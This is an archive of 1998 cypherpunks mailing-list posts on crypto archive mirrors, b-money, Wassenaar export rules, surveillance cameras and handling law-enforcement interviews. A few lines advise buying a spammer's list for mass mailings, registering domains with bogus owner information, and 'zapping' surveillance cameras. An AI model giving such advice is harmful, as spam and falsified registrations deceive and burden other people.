Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Thu, 10 Dec 1998 01:13:52 +0800
To: Anonymous <nobody@replay.com>
Subject: Re:
Message-ID: <19981209152621.2358.rocketmail@send1e.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



They say education is power abd naybe they were correct.  I agree with
the fact that more people need to use encryption, the problem (as you
stated) is that people do not understand how to use it, or even know
it exists.  Unfortunate for us, fortunate for big brother.  While the
only way we can counteract this debate is through empowerment, the
question remains, how do you spread the word to up to a million
people, enough to get their interest and keep it, enough to take the
time to teach them how to use the tools.  I work for an IT department
and the users I train rank from intelligent to "where the hell did you
come from?!"  Teaching people who have no want or need is the hardest
part, just ask Christians, they know what it's like.  Our greatest
problems lie within our inability to train and make use of what lies
in front of us, if people don't see the need, then why would they?
  Another point, some people feel that if they have nothing to hide,
then why use it.  An acquaitance of mine has the same stubborn
attitude, what steps do you take to thwart that?  That excuse bothers
me beyond belief, but it is a common thought that if you need to take
the steps to hide something, then it must be wrong.  God help us. . .




---Anonymous <nobody@replay.com> wrote:
>
> I think setting up mirror sites of crypto archives 
> across the world is a great idea.  However, I also 
> think we need to focus on getting more and more 
> people to use crypto.  I would guess that the vast 
> majority of computer users worldwide see no use 
> for encryption in their day-to-day lives -- and 
> even those that do don't also use it.
> 
> If everybody in the world is using encryption, it 
> is going to be extremely difficult for "democratic" 
> governments to tell them they can't use it any more.
> 
> Unfortunately, it's easy for governments to blame 
> crypto for terrorism and a host of other crimes, 
> simply because the average citizen doesn't understand 
> the concept of an "electronic envelope".
>         
> 
> 

==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Birch <daveb-lists@mail.hyperion.co.uk>
Date: Wed, 9 Dec 1998 16:11:27 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: Wei Dei's "b-money" protocol
Message-ID: <1298933977-40691626@hyperion.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai said

>However if it did become mainstream I think there are some
>interesting macroeconomic questions here. Will prices really be stable as
>they're designed to be? Will there be business cycles? What is the optimum
>inflation/deflation rate?

Perhaps a solution is to fix not on a basket of commodities, or equities, 
but on provision of future service (much like Frequent Flier miles). 
Suppose the money is demoninated in Mb of web hosting (I've no idea 
whether this would be a good choice as I just made it up). Then you know 
you'll get what you want in terms of service, irrespective of the 
inflation/deflation. Sure, if web space inflates against the dollar then 
that's a problem (for people with dollars). But suppose you could 
accumulate the things that you actually want rather than specie (as a 
proxy)?

Consider this as a thought experiment. Microsoft issue m$, each m$ being 
worth 1 minute of Microsoft technical support. People who need Microsoft 
technical support would buy m$ (big companies would know roughly how much 
they might need) whereas people who don't need or want it would sell m$. 
Instead of storing up dollars, the value of which might fluctuate 
(especially since Microsoft could change the price of technical support 
whenever they want), companies now have a firm fix.

Just an idea.

Regards,
Dave Birch.

=== mailto:daveb@hyperion.co.uk ===== http://www.hyperion.co.uk/ ===




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 9 Dec 1998 21:24:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Building crypto archives worldwide to foil US-built BerlinWalls
Message-ID: <v04020a1db2941e979230@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: John Young <jya@pipeline.com>
Cc: cryptography@c2.net, John Gilmore <gnu@toad.com>
Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls
Date: Tue, 08 Dec 1998 19:36:23 -0500
From: Dan Geer <geer@world.std.com>
Sender: owner-cryptography@c2.net


Tradeoff time.

====

Q: Is it better for the providers of crypto resources to alarm/log
   accesses to their websites or not?

I'd strongly argue not;
  Team Despot will disguise itself and we are surveilled as we speak;
  Team Legion loses if it creates targets for harvesting.

====

Q: Is coordinated integrity control (code signing) a Good Thing?

I'd weakly argue not;
  The absence of a coordinated signing strategy does not preclude
  verification so avoiding common-mode fraud, e.g., long-running
  denial of service attacks on the central signing agent, seems
  advantageous.

Alternative argument;
  Integrity of crypto code can be signed via quorumed split-key
  means so that no single actor fraud is effective yet only the
  minimum quorum need be online at any given time; this has
  the advantage that a completed split-key signature cannot be
  attributed to which quorum subset made it yet is verifiable
  by ordinary client means once complete.  Since intermediate
  (partial signing) results do not leak fragment holder identity,
  quorum members can indirectly communicate through commonly
  held dead-drops.

====

Q: Should requestors routinely avoid surveilled identification?

I'd argue strongly for:
  We, Team Legion, must commit to a cell organization with
  pseudonymity coverage such as through the "Crowds" system;
  to avoid any one of us being guilty we must all be.

====

Getting the problem statement right for this
endeavor is the most important thing we have
left to do.  If the above sample is misguided,
say so.  To the extent it is incomplete, fix
it.  If one of us goes off the air, step into
their place.

It is time for us to walk the fine line between
undue paranoia and a heightened state of awareness.

--dan

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 9 Dec 1998 22:44:49 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Building crypto archives worldwide to foil US-built Berlin (fwd)
Message-ID: <199812091354.HAA18154@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 9 Dec 1998 07:33:32 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Re: Building crypto archives worldwide to foil US-built Berlin
>  Walls

> ====
> 
> Q: Is it better for the providers of crypto resources to alarm/log
>    accesses to their websites or not?
> 
> I'd strongly argue not;
>   Team Despot will disguise itself and we are surveilled as we speak;
>   Team Legion loses if it creates targets for harvesting.
> 
> ====

>From a security standpoint it is advised to log access and all resource use
for about 4-5 days so you can get a sample big enough to look for
under_the_radar_hacking. On the flip side you don't want to keep them longer
than that because they could be used in an incriminating manner, whether an
actual criminal act occured or not. I use the default buffer time (4 days)
for my mail package as my ttl value. Once that time is past the files are
bye bye.

If the security of the site is compromised then it's pretty worthless as an
archive.

> Q: Is coordinated integrity control (code signing) a Good Thing?
> 
> I'd weakly argue not;

> Alternative argument;

> ====

The code shouldn't be signed by any of the archive sites, they shouldn't put
their butts on the line. The code should be signed by the originators of
same. This verifies that ALL the archive sites have the same package and not
individualy modified ones.

The archive sites should provide some sort of hash to verify successful
transfers.

> Q: Should requestors routinely avoid surveilled identification?

> ====

There isn't any way around this one. If the site is up and it's advertised
and publicly accessible then expect to be identified. Either the owner of
the domain/network resources you're using or your registration to the
relevant domain name authorities will provide ample pointers. Of course
there is the strategy of registering the domain for a year only and then
each year register a new one. Then you could provide bogus address and owner
information. This of course won't slow a packet sniffer down for long. Onion
and CROWDS won't help here unless you're connected directly to the
anonymizer. If you're that close they'll find you by following the wires.

> it.  If one of us goes off the air, step into
> their place.

You so glibly throw people away...it's better to fix a system such that
there is a legal ramification (ie resistance) for the LEA's applying the
pressure; a fight in court. Beside shutting the sites down another primary
goal of LEA's is to keep the conflict off the evening news. There is ample
evidence of LEA's dropping charges because the group made it known they were
going to use their day in court as a platform for espousing their agenda.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Thu, 10 Dec 1998 02:37:48 +0800
To: cypherpunks@cyberpass.net
Subject: Re: No Subject ( camera nonsense )
Message-ID: <366EB658.3E32@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> I think we read a message not so long ago from a 'punk who
> spotted the prototype of these 'bomb-sniffing cameras' along
> a California highway, no?
>
Don't remember the date but when asked to pinpoint the thing so someone
else could actually go take a look there was no response from the
original poster. I wrote it off as babbling.

There is one device above the westbound section of 580 on the Livermore
side of the Altamont pass. About the size of a small SpectraPhysics
Laser, the surface appears solid - i.e. no visual sensor. My best guess
- radar for either speed measurement or traffic density measurement. 
Chemical sniffer - NOT. 
Radiation detector - perhaps, but I doubt it.

Best bet - traffic analysis. These counties here are always fighting
about population growth and the traffic implications. As if one stinking
town owns the entire godamned federal interstate. Little, carpetbagging
Napoleans everywhere you look. 

As for neural systems detecting illegal activity - yeah? what? Two
people talking? Looking disreputable? Having their hands *appear* to
coincide for a second? This "technology", if detected in a public place,
should be zapped and the promoters tarred and feathered*. 

*Superglue or RTV and polyfill may legally be substituted for the
traditional materials. 

m




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Thu, 10 Dec 1998 02:28:59 +0800
To: <cryptography@c2.net>
Subject: What happened to this NY Times article on STOA and Echelon?
Message-ID: <006401be239b$9d75d200$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any idea what happened
to this article on STOA and Echelon?

http://www.icdc.com/~paulwolf/nytimes.htm

I cannot seem to find it in the NY Times
archives.  Is it really from 1998?  Could
it be from 1997?

Anyone been in contact with the author?

Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 9 Dec 1998 23:56:58 +0800
To: ichudov@Algebra.COM (Igor Chudov)
Subject: Re: I Got Mine
In-Reply-To: <199812082325.PAA28704@smtp.well.com>
Message-ID: <199812091457.GAA06871@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain




Boston on Surviving Y2K
By Boston T. Party
Common Law Copyright 1998 by Javelin Press
ISBN 1-888766-05-0
$22 softcover, $12.30 in bulk

I have seen a web site for this book, though don't have it bookmarked. Try
javelinpress.com.

-Declan


At 09:51 PM 12-8-98 -0600, Igor Chudov @ home wrote:
>Declan McCullagh wrote:
>> 
>> Well, if you're worried about worst-case scenarios (or variants on them)
>> it's as good as any and probably better than most. They've got everything
>> from gun tips to goat-raising.
>> 
>> I enjoyed it, FWIW. It doesn't make a pretense of saying what-if like a
>> bunch of the other books does: this says social unrest is damn near
certain.
>
>Alright, Declan, what is the title of the book, and better yet the
>ISBN? Thank you.
>
>igor
>
>> -Declan
>> 
>> 
>> At 03:13 PM 12-8-98 -0600, Igor Chudov @ home wrote:
>> >Declan McCullagh wrote:
>> >> 
>> >> At 12:07 PM 12-8-98 -0600, Igor Chudov @ home wrote:
>> >> >What I am looking for is a practical guide book on how to deal with
>> >> >cops and other law enforcement/jackbooted thug types, in the manner
>> >> >that minimizes my long term damage. Something along the lines of "You
>> >> >and the Police!", by Boston T. Party, a book that I greatly enjoyed.
>> >> 
>> >> BTW BTP has just come out with a Y2K book. It's a great read.
>> >
>> >Is it a useful book? BTP writings are always fun to read, but some of
>> >his recommendations seem suspect.
>> >
>> >	- Igor.
>> > 
>> 
>
>
>
>	- Igor.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Wed, 9 Dec 1998 10:58:48 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: spy cameras
In-Reply-To: <199812090104.RAA19228@netcom8.netcom.com>
Message-ID: <Pine.LNX.3.96.981209101158.9137A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 8 Dec 1998, Vladimir Z. Nuri wrote:

> >From :
> http://www.telegraph.co.uk:80/et?ac=001036222020742&rtmo=VqqqD8sK&atmo=kkkkkkku&P4_FOLLOW_ON=/98/12/3/ecnspy03.html&pg=/et/98/12/3/ecnspy03.html
> - -
> Smart spy cameras on the way
> 
> By Patrick Hook
> 
> POLICE scientists are close to a major breakthrough that will allow CCTV
> cameras to "recognise" criminal activity.

Why does this remind me of the book "Agent of Chaos" by Norman Spinrad?

For those of you who have not read the book (and you should), the
uber-police state was run by a master computer that could "recognise
criminal behaviour" and immediatly kill anyone engaged in such activities.
You find out later that it is not quite what it seems.

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Dec 1998 00:37:51 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Wassenaar/Crypto News
Message-ID: <199812091532.KAA16119@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



A BXA spokesperson said today that the text of the recent 
Wassenaar agreement had been received yesterday and it is 
now being prepared for release on the BXA website 
(www.bxa.doc.gov) maybe by the end of the week but maybe 
not until next week. She said she expected the US to be the 
first to publish the doc, after I cited the WA message below 
from Caspar Bowden.

She also said that the Practising Law Institute (www.pli.edu)
session on encryption controls yesterday was taped and inquiries 
should be made to PLI (a continuing legal ed org; ) 
1-(800) 260-4PLI. And that Bill Reinsch did not participate in 
the session, only gave the speech on Dec 7 noted here 
yesterday: 

  http://jya.com/war120798-2.htm

An inquiry to PLI (Betty Gray) has not been returned.

>From UK Crypto:

From: "Caspar Bowden" <cb@fipr.org>
To: "Ukcrypto (E-mail)" <ukcrypto@maillist.ox.ac.uk>
Subject: More from Wassenaar Secretariat
Date: Wed, 9 Dec 1998 09:19:09 -0000
Message-ID: <000401be2355$07529ec0$dc77e4d4@cpsb>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal

-----Original Message-----
From: Wassenaar Secretariat [mailto:secretariat@wassenaar.org]
Sent: Tuesday, December 08, 1998 16:54
To: Caspar Bowden
Subject: Re: Attn: Dirk Weicke

Mr. Weicke is still away, however, I can assure you that the Secretariat has
been recently authorized by all member states to publish the new Lists on
the web site.  This will be done as soon as possible.  Please be patient, we 
are a very small Secretariat.

Glenn Sibbitt
Special Advisor
WA Secretariat

Caspar Bowden wrote:

> Dear Mr.Weicke,
>
> We spoke by telephone on Fri afternoon.
>
> You mentioned that the text and details of the new agreement would be
> published on the Wassenaar website this week.
>
> I understand that you have been away sick for a few days (my 
> commiserations), but there have been reports from your colleagues 
> that there will in fact be no publication on your Website.
>
> I'd be most grateful if you could just confirm when publication of 
> details will take place, in particular the "Cryptography Note" detailing 
> key-length limits, and definitions of categories.
>
> Kind regards
> --
> Caspar Bowden                    http://www.fipr.org
> Director, Foundation for Information Policy Research
> Tel: +44(0)171 354 2333      Fax: +44(0)171 827 6534






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Dec 1998 02:31:35 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: The politics of crypto archives
Message-ID: <199812091742.LAA18947@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



 Forwarded message:
 
 > Date: Wed, 09 Dec 1998 17:46:37 +0100
 > From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
 > Subject: Re: Building crypto archives worldwide to foil US-built Berlin Walls (fwd)
 
 > Let there be a large number of sites. If part of these fail, there
 > are others that are successful. (Compare evolution.)
 
 But two sites don't reproduce to make a 3rd site, some set of sites don't
 deny environmental resources to others, etc. etc. Your analogy is flawed on
 many levels.
 
 If the sites go down that often what motive would somebody else have if they
 know they'll face the same sorts of problems and won't have any additional
 resources to help them face it?
 
 Why would you put up a site if you knew that the 14 others before had failed
 and that nobody would help with your legal fees when you did go down?
 
 It's one thing to put your neck on the block for yourself, it's a whole
 other issue when you start asking other people to do it for your benefit
 (they obviously don't need an archive since they have the resources already)
 when you make it clear that you won't reimburse or otherwise recognize their
 efforts for YOU.
 
 > > > If the 'economies', 'infrastructure' 'religon' and what not of the
 > > > countries do not (yet) affect crypto laws, why care about them? If
 > > 
 > > They effect crypto by defintion.
 > 
 > How, for example, can they affects the functioning of an archive, if 
 > you get the right people and machine?
 
 Because those machines have to be available and paid for, their utilities need
 to exist and need to be reliable, the police need to have some sort of legal
 boundary to cross, and you need some recognized and guaranteed legal recourse 
 for your own self defence.
 
 Those are just a couple of the issues involved in running a archive site.
 
 Things don't exist in vacuum. You naively take WAY(!!!) too much for
 granted.
 
 I'll tell you what. Just as an experiment put up a CDR node for 6 months
 and see what it's like. Keep the box up 24 hours a day, pay the electricity,
 phone lines, domain name, etc. We're talking less than $500 total if you
 already own a box. Such an experiment is within the reach of just about 
 any person who has sufficient resources (even students) to surf the web.
 
 If you don't have the infrastructure to send the email in the clear then
 crypto won't effect that one whit. And putting up an archive that nobody
 can get to is not worth the effort either.
 
 > > If they don't have crypto laws it's likely they don't have a lot of other
 > > sorts of laws and the social and economic structure those laws imply. This
 > > makes it very difficult to operate a archive with any sort of stability or
 > > protection.
 > 
 > It is not true that there are more gangsters in the small than in 
 > the powerful nations. What do you mean by stability (which has plenty 
 > of meanings)?
 
 Well of course not, the populations aren't comparable. However, it is clear
 that smaller 3rd world countries have much more stringent regulations or
 because the instability causes there to be no standards to regulation and
 lack many of the protections we in the US take for granted. It makes the
 continued existance of the archive problematic. Putting up an archive on
 Monday only to have it go down on Tuesday is pyrrhic at best.
 
 I use stability in the commen political meaning. The country has a
 political and social system that is long-lived, has a well defined mechanism
 for transfer of power (if they even recognize transfer of power), etc.
 
 If you're in a situation where some rebels or other forces start lobbing
 mortar shells into your immediate area then crypto is the least of your 
 worries. Or as in Columbia where a group drove into town, drug people out
 into the street and shot them in the head.
 
 Consider S. Korea. Even though it's a democracy it's illegal to operate a
 firewall. The closest place S. Koreans can get in many cases to a firewall
 and network security (for groups outside of S. Korea) is Australia. Now how
 do you expect to seriously run a crypto site when the military and police
 have a legal authority to come rummage in your system at will? And can put
 you in detention if you deny them that access?
 
 Those sorts of places are where crypto is needed but clearly can't do the
 job for themselves.
 
 > > And what about the costs and effects incurred by that person you so glibly
 > > throw away?
 > 
 > I suppose that running an archive is a voluntary (self-sacrificing)
 > act of a benovolent person ready to offer his service to the public. 
 > If his site has to close down sometime later, he has to accept his 
 > bad luck. Why should you care so much minutely for him? (And you
 > say below that the money problem is trivial!)
 
 No, it isn't self-sacrifice. It's sacrifice for the users of that archive.
 Their motives are not self-centered, they're society centered. As users of
 those archives you OWE them.
 
 I would suggest strongly(!) that you spend more time studying ethics and
 morality.
 
 > So it rests to find people who have the time and (that small) money 
 > and energy to run sites and some countries that aren't going to
 > have strict cryto laws in the near future. THAT, however, is
 > difficult, I believe.
 
 Duh. I wonder why....(well, actualy I don't)
 
 

    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 10 Dec 1998 02:56:37 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (fwd)
Message-ID: <199812091747.LAA19022@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 9 Dec 1998 07:26:21 -0800 (PST)
> From: "Joel O'Connor" <ogrenivek@yahoo.com>
> Subject: Re: 

> They say education is power abd naybe they were correct.  I agree with
> the fact that more people need to use encryption, the problem (as you
> stated) is that people do not understand how to use it, or even know
> it exists.  Unfortunate for us, fortunate for big brother.  While the
> only way we can counteract this debate is through empowerment, the
> question remains, how do you spread the word to up to a million
> people, enough to get their interest and keep it, enough to take the
> time to teach them how to use the tools.  I work for an IT department

I'd say the obvious answer is to buy a spammers mailing list and then use
it to send out a one-time-only missive on the issues with a directive of
where to go for more information. Mass email letters to newspapers all over
the US (or whereever you are). Hit usenet with copies. Buy add space in
newspapers and magazines. Hit up the local media for PSA's. Use the local
public access television stations. etc.

It's not the how that people are having a hard time with, it's the why.



    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Dec 1998 02:56:38 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Intelligent cameras, a reference
Message-ID: <199812091817.MAA19280@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Scientific American
Apr. 1996
Smart Rooms
Alex P. Pentland
pp. 68 - 76


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ted Rallis" <trallis@certicom.com>
Date: Thu, 10 Dec 1998 05:52:09 +0800
To: cypherpunks@toad.com
Subject: Re: News on Wassenaar anyone?
Message-ID: <882566D5.00704154.00@domino2.certicom.com>
MIME-Version: 1.0
Content-Type: text/plain



If cryptography protecting intellectual property is exempt from regulation,
my words are now my intellectual property -- all of them.

Ted





Jan Garefelt <jang@pobox.se> on 12/08/98 11:11:33 AM

To:   cypherpunks@toad.com
cc:    (bcc: Ted Rallis/Certicom)
Subject:  News on Wassenaar anyone?




Does anyone have information on the new Wassenaar arrangement, or
information on when official information will be available?

I'm only interested in the crypto parts, and I have already read the
Aaron/Reuter story found on
http://www.crypto.com/reuters/show.cgi?article=912708583

Thanks

/Jan Garefelt







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 10 Dec 1998 03:16:43 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: LEA Interviews
Message-ID: <199812091821.NAA09307@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



This is attorney protected information.

We've been having discussion with a legal person about being
interviewed by law enforcement officials and/or signing a 
statement. These comments are offered by permission (and might 
be coupled with DCF's advice of saying only "I Want a Lawyer"):

[Begin comments]

> What do  you mean, that they would use the information to 
> "impeach" a possible witness?  Do you mean that he would not 
> be called to testify against a defendant?

Sorry to be opaque - "impeachment" means, basically, making a 
witness lose credibility with the jury. The only use I've been 
able to imagine for wanting a written statement is to make you 
look bad, in the event that you are called by either side to 
testify, and end up testifying favorably to the defendant. If you
appear to be a "hostile witness", it's even possible that you can 
be impeached by the attorney/party who asked you to testify.

The scenario I see looks something like this - 

1.	You're called as a defense witness to testify to the 
effect that you've been on the list for years, messages like the
defendants's weren't unique or especially unusual, that you 
understood them as satire or political commentary and not as actual 
threats, given the wider context in which they occurred. The 
general impression conveyed by your testimony is that you're a 
rational, reasonable, respectable person who the jury can like and 
trust, that you think the defendant is perhaps weird but basically 
misunderstood and harmless. 

2.	The prosecution cross-examines you about your conclusions 
re the defendant - they're going to ask you how well you really 
knew/know him, how much you knew about his other behavior (they're 
likely to try to sneak in information about the defendant's other 
alleged misbehavior here, if they haven't already), and so forth. 

To the extent that you say you didn't know him, your direct 
testimony becomes less and less relevant - and if you start to
say that you did know him well, they're likely to produce the 
document you wrote/signed, and ask you a series of uncomfortable 
questions about it, designed to create the impression you were 
lying to the jury earlier during your testimony, e.g., if the 
statement says "I didn't know that the defendant had done these 
other creepy things, and they make me question whether or not I
know him very well, and I feel differently about his threats now 
that I know about those creepy things", the prosecutor will make 
a big production out of pointing out the differences between your 
testimony at trial and what you wrote during the LEA interrogation. 

Understandably, you probably wanted to distance yourself from 
the defendant when the LE agents were in your home, especially 
after they'd given you a list of creepy things he supposedly did - 
but they're going to hold you to the same degree of distance from 
him and his thoughts/actions if you end up testifying at trial. 

Writing it down and having you sign it serves several purposes - 
it gives the prosecutor a document s/he can wave around, ask you 
to read from, and otherwise organize a little production around - 
it also lets you be impeached with your own words, instead of 
calling the cops to the stand to dispute your recollection of 
your conversation, which takes on a "he said/she said" tone, and 
might make it look like the big mean cops were picking on poor
little you. If they can make poor little you eat his own words, 
they look good, and you look bad.

So .. that's what I'm afraid the document is for. I've been trying 
to think of something else - but especially where the agents asked 
you to pick out just key bits of your conversation, and assert that 
they're true, and let the rest of the information be lost to memory 
and time .. it makes me think the information they selected was 
important to them. The information they got seems helpful to them 
only in the context that you end up testifying at trial - I can't 
think of any other reason it would be useful to them. It sounds 

like the psychological factors of the questioning were pretty well
optimized to make you want (probably partly subconsciously) to 
distance yourself from the defendant, both to avoid implied guilt 
by association, and to maintain a common ground of reasonableness 
with the cops while discussing other things like politics. 

The current issue of the Utne Reader has a piece by the Unabomber's 
brother and his wife talking about how the FBI manipulated them 
into providing evidence against the Unabomber by appearing
sympathetic and reasonable, forming a common "us (good people) 
versus the actions of they crazy guy, who needs us to work together 
to help him get better" bond which was ultimately used to try to 
kill the crazy guy, to the horror of the brother/wife. 

While I do think that they may have pulled a fast one on you, I don't 
think that reflects badly on you as a person .. it's pretty difficult 
to tell which cops are actually reasonable people, and which are 
pretending to be reasonable people in order to further their own 
agendas. 

[End comments]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Dec 1998 04:06:33 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: The politics of crypto archives (fwd)
Message-ID: <199812091926.NAA19818@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 09 Dec 1998 20:03:05 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: The politics of crypto archives

> We were talking about a site that has to be closed because of (new)
> crypto laws, not technically down which is seldom with modern hardware.
> And also you said that money is no problem!

You need to go back and re-read what prompted this. Your responce is
completely out of context.

> Why you care so much about people who voluteer to run sites? They
> certainly know what kind of risks that they probably face, financial
> or otherwise. Do you care your neighbour who opens up a new company
> and do you feel unconditionally have to give him advices?? Are you 
> the one who is cleverer than all the others?

It depends, do I shop there?

I'm done with this discussion. You want to expect people to put their neck
on the line and you use their services while owning them nothing then wonder
why nobody does it, so be it.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 10 Dec 1998 04:08:48 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: German government press release on Wassenaar (fwd)
Message-ID: <199812091927.NAA19892@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 9 Dec 98 20:04 +0100
> From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
> Subject: Re: German government press release on Wassenaar

> 1.) Officials point out that "export control" does not mean "export
> restriction".

Spin-doctor bullshit.

  There are forms of "export control" (such as the
> requirement to notify the Export Office of your exports) that do not
> hinder the export of crypto software in any significant way.  So it
> remains to be seen how Germany and other countries will implement
> the new rules.

And why should one need to notify them if there is not at least the implied
ability on their part to say "NO, you won't either."?

> 2.) The government has acknowledged that public domain software
> remains unrestricted. This also applies to copyrighted software such
> as PGP which "has been made available without restrictions upon its
> further dissemination".

PGP is NOT unrestrited.


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wilson, Jamie (J.R.)" <jwilso37@visteonet.com>
Date: Thu, 10 Dec 1998 03:52:26 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Encryption for the Masses
Message-ID: <199812091830.NAA29833@mailfw2.ford.com>
MIME-Version: 1.0
Content-Type: text/plain



